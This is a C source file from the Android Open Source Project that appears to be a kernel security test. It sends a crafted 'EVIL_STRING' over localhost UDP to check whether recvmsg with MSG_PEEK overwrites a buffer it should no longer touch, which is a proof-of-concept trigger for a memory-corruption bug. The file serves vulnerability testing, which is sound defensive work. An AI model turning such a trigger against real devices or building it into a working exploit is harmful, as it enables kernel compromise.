1 /**
2 * Copyright (C) 2018 The Android Open Source Project
3 *
4 * Licensed under the Apache License, Version 2.0 (the "License");
5 * you may not use this file except in compliance with the License.
6 * You may obtain a copy of the License at
7 *
8 * http://www.apache.org/licenses/LICENSE-2.0
9 *
10 * Unless required by applicable law or agreed to in writing, software
11 * distributed under the License is distributed on an "AS IS" BASIS,
12 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 * See the License for the specific language governing permissions and
14 * limitations under the License.
15 */
16 #include <sys/types.h>
17 #include <sys/wait.h>
18 #include <arpa/inet.h>
19 #include <netinet/in.h>
20 #include <stdio.h>
21 #include <stdlib.h>
22 #include <string.h>
23 #include <sys/socket.h>
24 #include <sys/wait.h>
25 #include <unistd.h>
26
27 #define EVIL_STRING "123456789\x00OVERWRITE\x00"
udp_send()28 int udp_send()
29 {
30 int s;
31 struct sockaddr_in6 addr;
32 char data[160];
33 s = socket(AF_INET6, SOCK_DGRAM, IPPROTO_IP);
34 memset(&addr, 0, sizeof(addr));
35 addr.sin6_family = AF_INET6;
36 addr.sin6_port = htons(43786);
37 inet_pton(AF_INET6, "::1", &(addr.sin6_addr));
38 sendto(s, "data", 4, 0, (struct sockaddr*)&addr, sizeof(addr));
39 memset(data, 0, sizeof(data));
40 memcpy(data, EVIL_STRING, sizeof(EVIL_STRING));
41 sendto(s, data, sizeof(data), 0, (struct sockaddr*)&addr, sizeof(addr));
42 return 0;
43 }
44
udp_recv()45 int udp_recv()
46 {
47 int s;
48 struct sockaddr_in6 addr;
49 struct msghdr msg;
50 struct iovec iov[2];
51 char buf1[10], buf2[10], buf3[10];
52
53 s = socket(AF_INET6, SOCK_DGRAM, IPPROTO_IP);
54 memset(&addr, 0, sizeof(addr));
55 addr.sin6_family = AF_INET6;
56 addr.sin6_port = htons(43786);
57 inet_pton(AF_INET6, "::", &(addr.sin6_addr));
58 bind(s, (struct sockaddr*)&addr, 128);
59
60 memset(buf1, 0, sizeof(buf1));
61 memset(buf2, 0, sizeof(buf2));
62 memset(buf3, 0, sizeof(buf3));
63 memset(iov, 0, sizeof(iov));
64 memset(&msg, 0, sizeof(msg));
65 msg.msg_iov = iov;
66 msg.msg_iovlen = 2;
67 iov[0].iov_base = buf1;
68 iov[0].iov_len = sizeof(buf1);
69 iov[1].iov_base = buf2;
70 iov[1].iov_len = sizeof(buf2);
71 recvmsg(s, &msg, 0);
72
73 memset(buf1, 0, sizeof(buf1));
74 memset(buf2, 0, sizeof(buf2)); // buf2 is zeroed here.
75 memset(buf3, 0, sizeof(buf3));
76 memset(iov, 0, sizeof(iov));
77 memset(&msg, 0, sizeof(msg));
78 msg.msg_iov = iov;
79 msg.msg_iovlen = 1;
80 iov[0].iov_base = buf3;
81 iov[0].iov_len = sizeof(buf3);
82 recvmsg(s, &msg, MSG_PEEK); // No refrence to buf2 in this call.
83
84 printf("%s\n", buf2); // If buf2 has contents OVERWRITE, a vuln has occured.
85 return 0; // Exploit must occur in a forked process, return 113 won't work here.
86 }
87
main()88 int main()
89 {
90 pid_t send, recv;
91 int status = 0;
92 if ((recv = fork()) == 0)
93 exit(udp_recv());
94 sleep(1);
95 if ((send = fork()) == 0)
96 exit(udp_send());
97 for (pid_t pid = wait(&status); pid > 0; pid = wait(&status));
98 }
99